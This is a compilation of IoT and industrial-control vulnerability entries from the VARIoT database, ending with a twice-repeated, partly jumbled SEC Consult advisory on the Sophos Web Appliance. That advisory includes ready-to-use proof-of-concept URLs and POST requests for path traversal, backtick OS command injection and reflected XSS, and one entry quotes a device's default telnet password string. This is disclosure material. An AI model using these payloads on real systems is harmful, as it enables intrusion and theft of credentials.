VARIoT IoT vulnerabilities database

Belkin Wemo Switch before WeMo_US_2.00.2176.PVT could allow remote attackers to upload arbitrary files onto the system. Belkin Wemo Switch Exists in a vulnerability related to unlimited upload of dangerous types of files.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary firmware to the affected device; this can result in an arbitrary code execution within the context of the vulnerable application

The SaveToFile method in a certain ActiveX control in TrendDisplay.dll in Canary Labs TrendLink 9.0.2.27051 and earlier does not properly restrict the creation of files, which allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via a crafted web site. TrendLink provided by Canary Labs is a tool to help visualize data for analysis. The SaveToFile method provided in the ActiveX control in TrendLink contains a vulnerability where file creation is not properly restricted. Security Research and Service Institute - Information and Communication Security Technology Center (ICST), Taiwan R.O.C Kuang-Chun Hung reported this vulnerability to JPCERT/CC. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.A remote attacker may create an arbitrary file on the system and as a result, arbitrary code may be executed. Canary Labs Trend Link is prone to a vulnerability caused by an insecure method. Attackers can exploit this issue to overwrite arbitrary files in the context of the application (typically Internet Explorer) that is using the ActiveX control, which may aid in a remote code execution or cause denial-of-service conditions. Canary Labs Trend Link 9.0.2.27051 and prior versions are vulnerable. An attacker could exploit this vulnerability to write arbitrary content to arbitrary files

The Huawei Access Router (AR) before V200R002SPC003 allows remote attackers to cause a denial of service (device reset) via a crafted field in a DHCP request, as demonstrated by a request from an IP phone. Huawei AR Series Routers is a low-end router device introduced by Huawei. The Huawei AR series routers have an error in the authentication and authorization fields in the DHCP packets. The remote attacker is allowed to use the vulnerability to send specially-made DHCP packets to reset the device. To successfully exploit the vulnerability, the device needs to be used as a DHCP server. Successful exploitation of this vulnerability could result in a denial of service. Successfully exploiting this issue will result in a denial-of-service condition. Huawei AR V200R002C01SPC200 and prior versions are vulnerable. This product provides mobile and fixed network access methods, suitable for enterprise networks

RuggedCom Inc is the world's leading manufacturer of high-performance network and communications equipment for industrial environments. The Rugged Operating System Web API does not correctly verify permissions when executing commands, allowing remote attackers to exploit vulnerabilities to execute certain commands with high permissions by operating the WebUI javascript.

RuggedCom Inc is the world's leading manufacturer of high-performance network and communications equipment for industrial environments. An unknown bug exists in the Rugged Operating System, which allows remote attackers to exploit vulnerabilities to make the device unmanageable, resulting in a denial of service attack.

The TP-Link TD-8817 is an ADSL router device. TP-Link TD-8817 has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to resolve, and perform arbitrary operations in the target user context, such as changing the administrator password. TP-LINK TD-8817 is an ADSL2 + Ethernet / USB demodulator router. A cross-site request forgery vulnerability exists in TP-LINK TD-8817 Router. An attacker could use this vulnerability to perform certain management operations and gain unauthorized access to the affected device

The DataSim and DataPid demonstration clients in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote servers to cause a denial of service (incorrect pointer access and client crash) via malformed data in a formatted text command. Cogent Real-Time Systems is a real-time data solutions vendor. If the user connects DataSim or DataPid to the server instead of DataHub, the server design generates a random or malformed message, then DataSim and DataPid will crash. Successfully exploiting this issue will result in a denial-of-service condition

There is a command injection vulnerability in D-Link's various router devices. DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 devices fail to properly verify dst parameter data and lack of verification of the session, allowing remote attackers to exploit The vulnerability is injected and executed by any shell command. DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 devices fail to properly restrict access to version.txt or DevInfo, allowing remote attackers to submit requests directly Model name, hardware version, kernel version, firmware version, MAC address information. D-Link is a network company founded by Taiwan D-Link Group. It is committed to the research and development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. Command injection vulnerabilities and multiple information disclosure vulnerabilities exist in multiple D-Link products. An attacker could use these vulnerabilities to gain access to potentially sensitive information and execute arbitrary commands in the context of an affected device

Integer signedness error in RNADiagnostics.dll in Rockwell Automation FactoryTalk Services Platform (FTSP) CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (service outage or RNADiagReceiver.exe daemon crash) via UDP data that specifies a negative integer value. The FactoryTalk Services Platform provides general services for products and applications in the FactoryTalk system (such as diagnostic information, health monitoring services, and real-time data access). The attacker can block subsequent links and cause rejection Service attack. The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. FactoryTalk Services Platform is prone to a denial-of-service vulnerability. The following versions are vulnerable: FactoryTalk Services Platform CPR9 FactoryTalk Services Platform CPR9-SR1 FactoryTalk Services Platform CPR9-SR2 FactoryTalk Services Platform CPR9-SR3 FactoryTalk Services Platform CPR9-SR4 FactoryTalk Services Platform CPR9-SR5 FactoryTalk Services Platform CPR9-SR5.1 FactoryTalk Services Platform CPR9-SR6. The vulnerability is caused by the program not properly processing the data submitted by the user

Integer overflow in RNADiagnostics.dll in Rockwell Automation FactoryTalk Services Platform (FTSP) CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (service outage or RNADiagReceiver.exe daemon crash) via UDP data that specifies a large integer value. The FactoryTalk Services Platform provides general services for products and applications in the FactoryTalk system (such as diagnostic information, health monitoring services, and real-time data access). The attacker can block subsequent links and cause a denial of service . The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. FactoryTalk Services Platform is prone to a denial-of-service vulnerability. The following versions are vulnerable: FactoryTalk Services Platform CPR9 FactoryTalk Services Platform CPR9-SR1 FactoryTalk Services Platform CPR9-SR2 FactoryTalk Services Platform CPR9-SR3 FactoryTalk Services Platform CPR9-SR4 FactoryTalk Services Platform CPR9-SR5 FactoryTalk Services Platform CPR9-SR5.1 FactoryTalk Services Platform CPR9-SR6

Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote attackers to cause a denial of service (NULL pointer dereference and application crash) via malformed data in a formatted text command. Cogent Real-Time Systems is a real-time data solutions vendor. An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. The following Cogent Real-Time Systems products are vulnerable: Cogent DataHub 7.2.2 and prior versions OPC DataHub 6.4.21 and prior versions Cascade DataHub for Windows 6.4.21 and prior versions Cogent DataHub DataSim and DataPid demonstration clients 7.2.2 OPC DataHub DataSim and DataPid demonstration clients 6.4.21 Cascade DataHub DataSim and DataPid demonstration clients 6.4.21 DataHub QuickTrend 7.2.2 and prior versions

Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 do not properly handle exceptions, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via malformed data in a formatted text command, leading to out-of-bounds access to (1) heap or (2) stack memory. Cogent Real-Time Systems is a real-time data solutions vendor. The Cogent Real-Time Systems DataHub application receives formatted text commands in TCP link mode that are parsed, verified, and executed within the application. An attacker can exploit this issue to execute arbitrary code within the context of the affected applications. Failed exploit attempts may crash the application, denying service to legitimate users. The following Cogent Real-Time Systems products are vulnerable: Cogent DataHub 7.2.2 and prior versions OPC DataHub 6.4.21 and prior versions Cascade DataHub for Windows 6.4.21 and prior versions Cogent DataHub DataSim and DataPid demonstration clients 7.2.2 OPC DataHub DataSim and DataPid demonstration clients 6.4.21 Cascade DataHub DataSim and DataPid demonstration clients 6.4.21 DataHub QuickTrend 7.2.2 and prior versions

The Aastra 6753i IP Telephone is an IP telephony device. The Aastra 6753i IP Telephone includes a built-in \"admin\" account for telnet. Its password hashing algorithm is relatively simple. It can be easily extracted using the \"vxworks_mem_search.rb\" tool, one of which is \"[M]qozn~\", using this account. Get shell access for denial of service and other attacks. Aastra 6753i IP Telephone 3.2.2.56 version has a security bypass vulnerability. An attacker could use this vulnerability to bypass security restrictions and perform unauthorized actions

Buffer overflow in LogReceiver.exe in Rockwell Automation RSLinx Enterprise CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a UDP packet with a certain integer length value that is (1) too large or (2) too small, leading to improper handling by Logger.dll. RSLinx Enterprise is a standard OPC server software that bridges the communication between RSView Server and PLC. RSLinx Enterprise (LogReceiver.exe and Logger.dll) does not process the input correctly. Receiving a very large packet can cause a logic error. The attacker sends a data containing a very large byte size to the 4444/UDP port (user configurable, not enabled by default). A package that stops the service or may cause arbitrary code execution. The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. RSLinx Enterprise is prone to a denial-of-service vulnerability because the application fails to properly handle the input submitted to it. An attacker can exploit this issue to terminate the affected service of the vulnerable application, denying service to legitimate users. Due to nature of this issue code execution is possible but Symantec has not confirmed it. Note: This BID is being retired as a duplicate of the issue discussed in BID 58917 (RSLinx Enterprise 'Logger.dll' CVE-2012-4695 Denial of Service Vulnerability). The following versions are affected: RSLinx Enterprise CPR9-SR2 RSLinx Enterprise CPR9-SR3 RSLinx Enterprise CPR9-SR4 RSLinx Enterprise CPR9-SR5 RSLinx Enterprise CPR9-SR5.1 RSLinx Enterprise CPR9-SR6. This software can establish communication links for Allen-Bradley (AB) programmable controllers, various Rockwell software, and AB application software. A buffer overflow vulnerability exists in LogReceiver.exe in Rockwell Automation RSLinx Enterprise

Stack-based buffer overflow in the web server in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP header. Cogent Real-Time Systems is a real-time data solutions vendor. An attacker can exploit this issue to execute arbitrary code within the context of the affected applications. Failed exploit attempts may crash the application, denying service to legitimate users. and prior OPC DataHub versions 6.4.21 and prior Cascade DataHub for Windows version 6.4.21 and prior Cogent DataHub DataSim and DataPid demonstration version 7.2.2 OPC DataHub DataSim and DataPid demonstration clients version 6.4.21 Cascade DataHub DataSim and DataPid demonstration clients version 6.4.21 DataHub QuickTrend version 7.2.2 and prior

LogReceiver.exe in Rockwell Automation RSLinx Enterprise CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (service outage) via a zero-byte UDP packet that is not properly handled by Logger.dll. RSLinx Enterprise is a standard OPC server software that bridges the communication between RSView Server and PLC. RSLinx Enterprise (LogReceiver.exe and Logger.dll) does not process input correctly, receiving a zero byte packet can cause a logic error, and the attacker sends a zero byte size to the 4444/UDP port (user configurable, not enabled by default) A packet, when the service ignores the inbound request, causes a denial of service attack. The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. RSLinx Enterprise is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. The following versions are vulnerable: RSLinx Enterprise CPR9 RSLinx Enterprise CPR9-SR1 RSLinx Enterprise CPR9-SR2 RSLinx Enterprise CPR9-SR3 RSLinx Enterprise CPR9-SR4 RSLinx Enterprise CPR9-SR5 RSLinx Enterprise CPR9-SR5.1 RSLinx Enterprise CPR9-SR6. This software can establish communication links for Allen-Bradley (AB) programmable controllers, various Rockwell software, and AB application software

Cisco Tivoli Business Service Manager (TBSM) in Hosted Collaboration Mediation (HCM) in Cisco Hosted Collaboration Solution allows remote attackers to cause a denial of service (temporary service hang) by sending many TCP packets to certain ports, aka Bug ID CSCue03703. The Cisco Prime Central for HCS Assurance is prone to a denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCue03703

The Schneider Electric M340 PLC modules allow remote attackers to cause a denial of service (resource consumption) via unspecified vectors. NOTE: the vendor reportedly disputes this issue because it "could not be duplicated" and "an attacker could not remotely exploit this observed behavior to deny PLC control functions. ** Unsettled ** This case has not been confirmed as a vulnerability. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems

Directory traversal vulnerability in patience.cgi in Sophos Web Appliance before 3.7.8.2 allows remote attackers to read arbitrary files via the id parameter. This may aid in further attacks. Versions prior to Sophos Web Protection Appliance 3.7.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: <= 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- "Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users." URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: ------------------------ SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) Unauthenticated users can read arbitrary files from the filesystem with the privileges of the "spiderman" operating system user. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. 2) OS command injection (CVE-2013-2642) Authenticated users can execute arbitrary commands on the underlying operating system with the privileges of the "spiderman" operating system user. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities the exploit other vulnerabilities in the web interface or conducting phishing attacks. Proof of concept: ----------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication: https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users: https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE"). <host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" 2) OS command injection (CVE-2013-2642) The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user "spiderman": POST /index.php?c=diagnostic_tools HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 92 Cache-Control: no-cache action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60 The "Local Site List" functionality allows injection of arbitrary OS commands: POST /index.php?c=local_site_list_editor HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 205 STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1). If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL: https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) The following URLs demonstrate reflected Cross Site Scripting vulnerabilities: https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E As the application uses URL parameters to transmit session IDs and rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes. Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities. This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker. Possible attack scenario: Use XSS to run malicous Javascript in the browser of a user who has network access to the web interface. This code can: - Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users. - Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system. - Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM). Vendor contact timeline: ------------------------ 2013-02-22: Sending advisory and proof of concept exploit via encrypted channel. 2013-02-23: Vendor acknowledges receipt of advisory. 2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates. 2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule. 2013-03-18: Vendor starts rollout of update to "a first group of customers". 2013-04-03: SEC Consult releases coordinated security advisory. More information can be found at: http://www.sophos.com/en-us/support/knowledgebase/118969.aspx Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com http://blog.sec-consult.com EOF Wolfgang Ettlinger, Stefan Viehb\xf6ck / @2013

Sophos Web Appliance before 3.7.8.2 allows (1) remote attackers to execute arbitrary commands via shell metacharacters in the client-ip parameter to the Block page, when using the user_workstation variable in a customized template, and remote authenticated users to execute arbitrary commands via shell metacharacters in the (2) url parameter to the Diagnostic Tools functionality or (3) entries parameter to the Local Site List functionality. Sophos Web Protection Appliance is prone to multiple command-injection vulnerabilities. Attackers can exploit these issues to disclose sensitive information and execute arbitrary commands with the privileges of the 'spiderman' operating system user. Web Protection Appliance 3.7.8.1 and prior versions are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: <= 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- "Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users." URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: ------------------------ SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities the exploit other vulnerabilities in the web interface or conducting phishing attacks. Proof of concept: ----------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication: https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users: https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE"). <host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" 2) OS command injection (CVE-2013-2642) The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user "spiderman": POST /index.php?c=diagnostic_tools HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 92 Cache-Control: no-cache action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60 The "Local Site List" functionality allows injection of arbitrary OS commands: POST /index.php?c=local_site_list_editor HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 205 STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1). If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL: https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) The following URLs demonstrate reflected Cross Site Scripting vulnerabilities: https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E As the application uses URL parameters to transmit session IDs and rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes. Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities. This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker. Possible attack scenario: Use XSS to run malicous Javascript in the browser of a user who has network access to the web interface. This code can: - Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users. - Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system. - Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM). Vendor contact timeline: ------------------------ 2013-02-22: Sending advisory and proof of concept exploit via encrypted channel. 2013-02-23: Vendor acknowledges receipt of advisory. 2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates. 2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule. 2013-03-18: Vendor starts rollout of update to "a first group of customers". 2013-04-03: SEC Consult releases coordinated security advisory. More information can be found at: http://www.sophos.com/en-us/support/knowledgebase/118969.aspx Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com http://blog.sec-consult.com EOF Wolfgang Ettlinger, Stefan Viehb\xf6ck / @2013